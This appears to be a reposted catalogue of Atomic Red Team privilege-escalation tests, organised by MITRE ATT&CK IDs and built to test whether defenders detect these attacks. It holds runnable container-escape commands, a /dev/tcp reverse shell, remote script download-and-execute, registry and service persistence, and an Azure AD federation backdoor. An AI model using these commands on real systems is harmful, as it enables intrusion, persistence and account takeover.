https://www.cnblogs.com/autopwn/p/17511222.html
ATOMIC - Privilege Escalation

* T1611 Escape to Host
* T1547 Boot or Logon Autostart Execution
* T1547.015 Boot or Logon Autostart Execution: Login Items
* T1547.014 Active Setup
* T1547.010 Boot or Logon Autostart Execution: Port Monitors
* T1547.009 Boot or Logon Autostart Execution: Shortcut Modification
* T1547.008 Boot or Logon Autostart Execution: LSASS Driver
* T1547.007 Boot or Logon Autostart Execution: Re-opened Applications
* T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions
* T1547.005 Boot or Logon Autostart Execution: Security Support Provider
* T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL
* T1547.003 Time Providers
* T1547.002 Authentication Package
* T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
* T1543.004 Create or Modify System Process: Launch Daemon
* T1543.003 Create or Modify System Process: Windows Service
* T1543.002 Create or Modify System Process: Systemd Service
* T1543.001 Create or Modify System Process: Launch Agent
* T1484.002 Domain Trust Modification
* T1484.001 Domain Policy Modification: Group Policy Modification
* T1134.005 Access Token Manipulation: SID-History Injection
* T1134.004 Access Token Manipulation: Parent PID Spoofing
* T1134.002 Create Process with Token
* T1134.001 Access Token Manipulation: Token Impersonation/Theft
* T1055 Process Injection
* T1055.012 Process Injection: Process Hollowing
* T1055.004 Process Injection: Asynchronous Procedure Call
* T1055.003 Thread Execution Hijacking
* T1055.001 Process Injection: Dynamic-link Library Injection
* T1053.007 Kubernetes Cronjob
* T1053.006 Scheduled Task/Job: Systemd Timers
* T1053.005 Scheduled Task/Job: Scheduled Task
* T1053.003 Scheduled Task/Job: Cron
* T1053.002 Scheduled Task/Job: At
* T1037.005 Boot or Logon Initialization Scripts: Startup Items
* T1037.004 Boot or Logon Initialization Scripts: Rc.common
* T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)
* T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)

--------------------------------------------------------------------------------

T1611 ESCAPE TO HOST

* Atomic Test #1 - Deploy container using nsenter container escape
* Atomic Test #2 - Mount host filesystem to escape privileged Docker container

DEPLOY CONTAINER USING NSENTER CONTAINER ESCAPE

kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'

MOUNT HOST FILESYSTEM TO ESCAPE PRIVILEGED DOCKER CONTAINER

if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
netcat -l -p #{listen_port} 2>&1

--------------------------------------------------------------------------------

T1547 BOOT OR LOGON AUTOSTART EXECUTION

* Atomic Test #1 - Add a driver

ADD A DRIVER

pnputil.exe /add-driver "#{driver_inf}"

--------------------------------------------------------------------------------

T1547.015 BOOT OR LOGON AUTOSTART EXECUTION: LOGIN ITEMS

* Atomic Test #1 - Persistence by modifying Windows Terminal profile
* Atomic Test #2 - Add macOS LoginItem using Applescript

PERSISTENCE BY MODIFYING WINDOWS TERMINAL PROFILE

mv #{settings_json_def} #{settings_json_tmp}
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
wt.exe

ADD MACOS LOGINITEM USING APPLESCRIPT

osascript #{scriptfile}

--------------------------------------------------------------------------------

T1547.014 ACTIVE SETUP

* Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup
* Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry
* Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number

HKLM - ADD ATOMIC_TEST KEY TO LAUNCH EXECUTABLE AS PART OF USER SETUP

New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup

HKLM - ADD MALICIOUS STUBPATH VALUE TO EXISTING ACTIVE SETUP ENTRY

Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup

HKLM - RE-EXECUTE 'INTERNET EXPLORER CORE FONTS' STUBPATH PAYLOAD BY DECREASING VERSION NUMBER

Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup

--------------------------------------------------------------------------------

T1547.010 BOOT OR LOGON AUTOSTART EXECUTION: PORT MONITORS

* Atomic Test #1 - Add Port Monitor persistence in Registry

ADD PORT MONITOR PERSISTENCE IN REGISTRY

reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ

--------------------------------------------------------------------------------

T1547.009 BOOT OR LOGON AUTOSTART EXECUTION: SHORTCUT MODIFICATION

* Atomic Test #1 - Shortcut Modification
* Atomic Test #2 - Create shortcut to cmd in startup folders

SHORTCUT MODIFICATION

echo [InternetShortcut] > #{shortcut_file_path}
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
#{shortcut_file_path}

CREATE SHORTCUT TO CMD IN STARTUP FOLDERS

$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()

--------------------------------------------------------------------------------

T1547.008 BOOT OR LOGON AUTOSTART EXECUTION: LSASS DRIVER

* Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt

MODIFY REGISTRY TO LOAD ARBITRARY DLL INTO LSASS - LSADBEXTPT

New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "#{dll_path}"

--------------------------------------------------------------------------------

T1547.007 BOOT OR LOGON AUTOSTART EXECUTION: RE-OPENED APPLICATIONS

* Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications
* Atomic Test #2 - Re-Opened Applications using LoginHook
* Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications

COPY IN LOGINWINDOW.PLIST FOR RE-OPENED APPLICATIONS

cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist

RE-OPENED APPLICATIONS USING LOGINHOOK

sudo defaults write com.apple.loginwindow LoginHook #{script}

APPEND TO EXISTING LOGINWINDOW FOR RE-OPENED APPLICATIONS

FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}

--------------------------------------------------------------------------------

T1547.006 BOOT OR LOGON AUTOSTART EXECUTION: KERNEL MODULES AND EXTENSIONS

* Atomic Test #1 - Linux - Load Kernel Module via insmod
* Atomic Test #2 - MacOS - Load Kernel Module via kextload and kmutil
* Atomic Test #3 - MacOS - Load Kernel Module via KextManagerLoadKextWithURL()
* Atomic Test #4 - Snake Malware Kernel Driver Comadmin

LINUX - LOAD KERNEL MODULE VIA INSMOD

sudo insmod #{module_path}

MACOS - LOAD KERNEL MODULE VIA KEXTLOAD AND KMUTIL

set -x
sudo kextload #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload #{module_path}
sudo kmutil load -p #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kmutil unload -p #{module_path}

MACOS - LOAD KERNEL MODULE VIA KEXTMANAGERLOADKEXTWITHURL()

sudo #{exe_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload /Library/Extensions/SoftRAID.kext

SNAKE MALWARE KERNEL DRIVER COMADMIN

$examplePath = Join-Path $env:windir "system32\Com";
if (-not (Test-Path $examplePath)) { New-Item -ItemType Directory -Path $examplePath | Out-Null };
$exampleName = "comadmin.dat";
$exampleFullPath = Join-Path $examplePath $exampleName;
$randomBytes = New-Object Byte[] 0x1000;
(New-Object Random).NextBytes($randomBytes);
[System.IO.File]::WriteAllBytes($exampleFullPath, $randomBytes)
--------------------------------------------------------------------------------

T1547.005 BOOT OR LOGON AUTOSTART EXECUTION: SECURITY SUPPORT PROVIDER

* Atomic Test #1 - Modify SSP configuration in registry

MODIFY SSP CONFIGURATION IN REGISTRY

# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
$SecurityPackagesUpdated += "#{fake_ssp_dll}"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
# revert (before reboot)
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages

--------------------------------------------------------------------------------

T1547.004 BOOT OR LOGON AUTOSTART EXECUTION: WINLOGON HELPER DLL

* Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
* Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
* Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
* Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell
* Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell

WINLOGON SHELL KEY PERSISTENCE - POWERSHELL

Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force

WINLOGON USERINIT KEY PERSISTENCE - POWERSHELL

Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force

WINLOGON NOTIFY KEY LOGON PERSISTENCE - POWERSHELL

New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force

WINLOGON HKLM SHELL KEY PERSISTENCE - POWERSHELL

Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force

WINLOGON HKLM USERINIT KEY PERSISTENCE - POWERSHELL

Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force

--------------------------------------------------------------------------------

T1547.003 TIME PROVIDERS

* Atomic Test #1 - Create a new time provider
* Atomic Test #2 - Edit an existing time provider

CREATE A NEW TIME PROVIDER

net stop w32time
Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
net start w32time

EDIT AN EXISTING TIME PROVIDER

net stop w32time
Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
net start w32time

--------------------------------------------------------------------------------

T1547.002 AUTHENTICATION PACKAGE

* Atomic Test #1 - Authentication Package

AUTHENTICATION PACKAGE

Copy-Item $PathToAtomicsFolder\T1547.002\bin\package.dll C:\Windows\System32\
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Authentication Packages" /t REG_MULTI_SZ /d "msv1_0\0package.dll" /f

--------------------------------------------------------------------------------

T1547.001 BOOT OR LOGON AUTOSTART EXECUTION: REGISTRY RUN KEYS / STARTUP FOLDER

* Atomic Test #1 - Reg Key Run
* Atomic Test #2 - Reg Key RunOnce
* Atomic Test #3 - PowerShell Registry RunOnce
* Atomic Test #4 - Suspicious vbs file run from startup Folder
* Atomic Test #5 - Suspicious jse file run from startup Folder
* Atomic Test #6 - Suspicious bat file run from startup Folder
* Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder
* Atomic Test #8 - Add persistence via Recycle bin
* Atomic Test #9 - SystemBC Malware-as-a-Service Registry
* Atomic Test #10 - Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value
* Atomic Test #11 - Change Startup Folder - HKCU Modify User Shell Folders Startup Value
* Atomic Test #12 - HKCU - Policy Settings Explorer Run Key
* Atomic Test #13 - HKLM - Policy Settings Explorer Run Key
* Atomic Test #14 - HKLM - Append Command to Winlogon Userinit KEY Value
* Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY Value
* Atomic Test #16 - secedit used to create a Run key in the HKLM Hive
* Atomic Test #17 - Modify BootExecute Value

REG KEY RUN

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"

REG KEY RUNONCE

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"

POWERSHELL REGISTRY RUNONCE

$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'

SUSPICIOUS VBS FILE RUN FROM STARTUP FOLDER

Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"

SUSPICIOUS JSE FILE RUN FROM STARTUP FOLDER

Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"

SUSPICIOUS BAT FILE RUN FROM STARTUP FOLDER

Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"

ADD EXECUTABLE SHORTCUT LINK TO USER STARTUP FOLDER

$Target = "C:\Windows\System32\calc.exe"
$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Create = $WScriptShell.CreateShortcut($ShortcutLocation)
$Create.TargetPath = $Target
$Create.Save()

ADD PERSISTENCE VIA RECYCLE BIN

reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f

SYSTEMBC MALWARE-AS-A-SERVICE REGISTRY

$RunKey = "#{reg_key_path}"
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"

CHANGE STARTUP FOLDER - HKLM MODIFY USER SHELL FOLDERS COMMON STARTUP VALUE

New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}"

CHANGE STARTUP FOLDER - HKCU MODIFY USER SHELL FOLDERS STARTUP VALUE

New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"

HKCU - POLICY SETTINGS EXPLORER RUN KEY

if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){ New-Item -ItemType Key -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" }
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"

HKLM - POLICY SETTINGS EXPLORER RUN KEY

if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){ New-Item -ItemType Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" }
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"

HKLM - APPEND COMMAND TO WINLOGON USERINIT KEY VALUE

$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
$newvalue = $oldvalue + " #{payload}";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"

HKLM - MODIFY DEFAULT SYSTEM SHELL - WINLOGON SHELL KEY VALUE

$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
$newvalue = $oldvalue + ", #{payload}";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"

SECEDIT USED TO CREATE A RUN KEY IN THE HKLM HIVE

secedit /import /db #{secedit_db} /cfg #{ini_file}
secedit /configure /db #{secedit_db}

MODIFY BOOTEXECUTE VALUE

if (!(Test-Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg")) { reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" /y }
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "BootExecute" -Value "#{registry_value}" -Type MultiString

--------------------------------------------------------------------------------

T1543.004 CREATE OR MODIFY SYSTEM PROCESS: LAUNCH DAEMON

* Atomic Test #1 - Launch Daemon

LAUNCH DAEMON

sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}

--------------------------------------------------------------------------------

T1543.003 CREATE OR MODIFY SYSTEM PROCESS: WINDOWS SERVICE

* Atomic Test #1 - Modify Fax service to run PowerShell
* Atomic Test #2 - Service Installation CMD
* Atomic Test #3 - Service Installation PowerShell
* Atomic Test #4 - TinyTurla backdoor service w64time
* Atomic Test #5 - Remote Service Installation CMD

MODIFY FAX SERVICE TO RUN POWERSHELL

sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start Fax

SERVICE INSTALLATION CMD

sc.exe create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
sc.exe start #{service_name}

SERVICE INSTALLATION POWERSHELL

New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"

TINYTURLA BACKDOOR SERVICE W64TIME

copy #{dllfilename} %systemroot%\system32\
sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
sc config W64Time DisplayName= "Windows 64 Time"
sc description W64Time "Maintain date and time synch on all clients and services in the network"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
sc start W64Time

REMOTE SERVICE INSTALLATION CMD

sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
sc.exe \\#{remote_host} start #{service_name}

--------------------------------------------------------------------------------

T1543.002 CREATE OR MODIFY SYSTEM PROCESS: SYSTEMD SERVICE

* Atomic Test #1 - Create Systemd Service
* Atomic Test #2 - Create Systemd Service file, Enable the service, Modify and Reload the service.
CREATE SYSTEMD SERVICE

echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file}
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file}
echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
systemctl enable #{systemd_service_file}
systemctl start #{systemd_service_file}

CREATE SYSTEMD SERVICE FILE, ENABLE THE SERVICE, MODIFY AND RELOAD THE SERVICE.
cat > /etc/init.d/T1543.002 << EOF
#!/bin/bash
### BEGIN INIT INFO
# Provides : Atomic Test T1543.002
# Required-Start: $all
# Required-Stop :
# Default-Start: 2 3 4 5
# Default-Stop:
# Short Description: Atomic Test for Systemd Service Creation
### END INIT INFO
python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
EOF
chmod +x /etc/init.d/T1543.002
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
systemctl enable T1543.002
systemctl start T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
systemctl daemon-reload
systemctl restart T1543.002

--------------------------------------------------------------------------------

T1543.001 CREATE OR MODIFY SYSTEM PROCESS: LAUNCH AGENT

* Atomic Test #1 - Launch Agent
* Atomic Test #2 - Event Monitor Daemon Persistence

LAUNCH AGENT

if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}

EVENT MONITOR DAEMON PERSISTENCE

sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}

--------------------------------------------------------------------------------

T1484.002 DOMAIN TRUST MODIFICATION

* Atomic Test #1 - Add Federation to Azure AD

ADD FEDERATION TO AZURE AD

Import-Module AzureAD
Import-Module AADInternals
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
try {
    Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null
} catch {
    Write-Host "Error: AzureAD could not connect"
    exit 1
}
try {
    $domain = Get-AzureADDomain -Name "#{domain_name}"
} catch {
    Write-Host "Error: domain ""#{domain_name}"" not found"
    exit 1
}
if (-Not $domain.IsVerified) {
    Write-Host "Error: domain ""#{domain_name}"" not verified"
    exit 1
}
if ($domain.AuthenticationType -eq "Federated") {
    Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before."
    exit 1
}
$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
if (-Not $at) {
    Write-Host "Error: AADInternals could not connect"
    exit 1
}
$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "#{domain_name}"
if ($new) {
    Write-Host "Federation successfully added to Azure AD"
    Write-Host $new
} else {
    Write-Host "The federation setup failed"
}
Write-Host "End of federation configuration."
--------------------------------------------------------------------------------

T1484.001 DOMAIN POLICY MODIFICATION: GROUP POLICY MODIFICATION

* Atomic Test #1 - LockBit Black - Modify Group policy settings -cmd
* Atomic Test #2 - LockBit Black - Modify Group policy settings -Powershell

LOCKBIT BLACK - MODIFY GROUP POLICY SETTINGS -CMD

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
